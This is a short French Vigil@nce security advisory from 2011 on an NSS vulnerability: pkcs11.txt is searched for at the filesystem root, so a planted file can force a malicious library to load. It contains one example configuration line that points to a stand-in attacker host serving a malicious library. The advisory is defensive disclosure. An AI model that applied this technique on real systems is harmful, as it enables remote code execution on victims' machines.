Vigil@nce : NSS, exécution de code via pkcs11.txt
novembre 2011 par Vigil@nce
Ce bulletin a été rédigé par Vigil@nce : http://vigilance.fr/offre
SYNTHÈSE DE LA VULNÉRABILITÉ
Lorsqu’un attaquant peut déposer un fichier illicite à la racine
du répertoire courant d’une application liée à NSS, il peut
charger une bibliothèque illicite, afin de faire exécuter du code.
– Gravité : 2/4
– Date création : 24/10/2011
PRODUITS CONCERNÉS
– Debian Linux
– Microsoft Windows - plateforme
– Unix - plateforme
DESCRIPTION DE LA VULNÉRABILITÉ
La bibliothèque NSS (Network Security Services) implémente
notamment des fonctionnalités de cryptographie.
La fonction NSS_NoDB_Init() charge le fichier pkcs11.txt, qui
contient des directives de configuration. La directive "library"
indique le nom d’une bibliothèque à charger. Par exemple :
library=\www.attacker.dom\dir\malicious.lib
Cependant, NSS_NoDB_Init() accepte de charger les fichiers situés
à la racine du système de fichiers contenant le répertoire courant
(\pkcs11.txt). Ainsi, si une application liée à NSS est démarrée
depuis un partage réseau, le fichier pkcs11.txt est recherché à la
racine de ce partage réseau.
Lorsqu’un attaquant peut déposer un fichier illicite à la racine
du répertoire courant d’une application liée à NSS, il peut donc
charger une bibliothèque illicite, afin de faire exécuter du code.
Le fichier secmod.db est aussi recherché à la racine.
ACCÈS AU BULLETIN VIGIL@NCE COMPLET
http://vigilance.fr/vulnerabilite/NSS-execution-de-code-via-pkcs11-txt-11095